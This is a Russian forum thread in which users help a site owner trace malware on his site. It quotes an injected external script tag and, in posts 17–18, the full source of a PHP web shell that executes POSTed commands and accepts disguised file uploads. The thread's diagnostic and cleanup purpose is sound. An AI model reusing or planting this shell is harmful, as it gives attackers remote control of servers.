Вирус на сайте

Печать / RSS
0
11. Олег 13.12.2017 / 23:55
Последний из могикан
Нет такой проги и такого сервиса, который может так тщательно просканировать твой сайт.
Что то около этого есть, но универсального средства нет, только мозгами и ручками можно и надёжно.
Просто пока не могу сообразить, где ещё может быть засада. Разве что только хостера тревожить.
0
12. dimon 14.12.2017 / 00:13
Пришелец
®_GodZiIIa_€,
Вот держи ссыль за инфу по твоей теме.
Тут как раз хоть будешь уже иметь представление что и где именно искать при атаке. За одно расписанно и за ручной поиск проблемы, как ты говоришь без применения прог и сервисов по сканированию.).gif

https://defcon.ru/web-security/326/
Изменил: dimon (14.12.2017 / 00:15)
+1
13. Nervous 14.12.2017 / 04:48
Отрешенный Nervous
®_GodZiIIa_€, Вот твое чудо
<script type="text/javascript" src="https://cloudcdn.gdn/js/?trl=0.30">
Вот твой js файл в котором прописан код
http://basaru.net.ru/engine/classes/js/jquery.js
Посмотри когда был изменен этот файл (число и время), значит тогда всунули в него код. Потом идешь к логам и смотришь логи, как попали в этот файл.
0
14. Thor 14.12.2017 / 08:47
Пришелец
®_GodZiIIa_€,
Хостинг beget
хост говно если честно, хостер думаю тоже
0
15. Олегъ 14.12.2017 / 10:42
Пришелец
Если есть какой скрытый код на странице, то его всегда обязательно видно в исходном коде, посмотри сам в браузере исходный код страницы, там всё видно что встроено всегда.

Добавлено через 02:18 сек.
И бегет нормальный хостинг, пользуюсь тарифом фри почти три года и имею несколько разный аккаунтов и сайтов на разных ай пи и ни разу никогда не было у меня к ним никаких замечаний, всегда все сайты быстрые и доступные.
0
16. Олег 14.12.2017 / 13:24
Последний из могикан
Отрешенный NERVOUS., спасибо, именно то !
Как это файл оказался заражённым, не понятно, дата изменения более года назад, а проявилось всё только сейчас.
Заменил файл нормальным, теперь всё без лишнего кода.
Придётся теперь отслеживать изменения, возможно где то бэкдор,
а может ещё раньше сам занёс вирусный файл, буду разбираться.
Всем огромная благодарность за подсказки, все они были важны.

А бегет да, нормальный хост, уже год на нём, всё нормально.
Кстати писал в поддержку, ответили и нашли проблемы, и тот же файл, что и Отрешенный NERVOUS указал, за что ему двойная благодарность !
0
17. Олег 14.12.2017 / 14:16
Последний из могикан
Вопрос к знатокам :
В этом коде есть шелл, или иные средства для взлома ?
< php <font face="monospace,terminal" size="-1"><pre><?php ob_end_clean(); ob_start(); $disablefuncs = array(); function myshellexec($cmd) { global $disablefuncs; if (empty($cmd)) { return ''; } $result = ''; if (is_callable('exec') and !in_array('exec', $disablefuncs)) { exec($cmd, $result);
$result = join("\n", $result); } elseif (($result = `$cmd`) !== FALSE) { } elseif (is_callable('system') and !in_array('system')) { ob_start(); system($cmd); $result = ob_get_contents(); ob_clean(); }
elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) { ob_start(); passthru($cmd); $result = ob_get_contents(); ob_clean(); }
elseif (is_resource($fp = popen($cmd,"r"))) { while(!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } else { $result = 'Shit. Can\'t execute command - paranoidal admin[s] has been disabled many functions!'; } return $result; } if (is_callable('ini_get')) { $disablefuncs = ini_get("disable_functions");
if (!empty($disablefuncs)) { $disablefuncs = str_replace(' ', '', $disablefuncs); $disablefuncs = explode(',', $disablefuncs); } else { $disablefuncs = array(); } } if (isset($_POST['execl'])) { echo $_POST['execl']. '<br>'; echo myshellexec($_POST['execl']); }
if (isset($_POST['pcntl_exec'])) { pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']); }
if (isset($_FILES['upfile'])) { if (is_uploaded_file($_FILES['upfile']['tmp_name'])) { move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']); echo '<b>Uploaded!</b>'; } } ?><br></pre>
0
18. Олег 14.12.2017 / 14:17
Последний из могикан
Продолжение кода
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit"></form><br><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit"></form><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">upload: <input type="text" name="fname" style="width:200px" value="profilepic605_1.png"><input type="file" name="upfile" style="width:70%"><input type="submit"></form><script>document.getElementById("bash").focus();</script></font><?php $text = str_replace("\n", '<br />', ob_get_contents()); ob_end_clean(); 
echo $text; ?>
0
19. Андрей 14.12.2017 / 20:55
Пацак
®_GodZiIIa_€, чот код в куче отформатируй его
0
20. Олег 14.12.2017 / 22:29
Последний из могикан
Сайт не вмещает в пост отформатированный, ограничение.
Для выполнения действия необходимо авторизоваться!
Стикеры / Теги / Правила / Топ тем / Топ тем / Поиск